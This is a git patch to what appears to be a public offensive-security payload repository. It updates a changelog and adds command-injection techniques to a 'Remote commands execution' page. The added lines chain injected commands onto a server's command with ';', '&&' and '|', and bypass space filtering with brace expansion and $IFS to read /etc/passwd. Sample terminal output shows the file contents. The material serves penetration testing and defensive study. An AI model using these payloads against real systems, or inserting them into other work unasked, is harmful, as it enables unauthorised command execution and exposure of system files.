From 9f66d48f2b077a884b35ead58bd7b5624817a267 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Sat, 12 Nov 2016 00:17:33 +0700 Subject: [PATCH] Update RCE payloads and README --- README.md | 5 ++--- Remote commands execution/README.md | 20 ++++++++++++++++++-- 2 files changed, 20 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 3d1b126..65f3a01 100644 --- a/README.md +++ b/README.md @@ -5,9 +5,8 @@ I <3 pull requests :) Last modifications : * XSS paylods improved -* CRLF payloads improved -* SQLi payloads improved -* Enumeration added (WIP) +* Methodology added +* AWS Bucket added # Tools diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index b312836..1e4efc3 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -12,11 +12,27 @@ bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh ``` +Code execution by chaining commands +``` +original_cmd_by_server; ls +original_cmd_by_server && ls +original_cmd_by_server | ls +``` Code execution without space ``` -{cat,/etc/passwd} -cat$IFS/etc/passwd +swissky@crashlab▸ ~ ▸ $ {cat,/etc/passwd} +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin + +swissky@crashlab▸ ~ ▸ $ cat$IFS/etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin + +swissky@crashlab▸ ~ ▸ $ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd +RCE +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin ``` NodeJS Code execution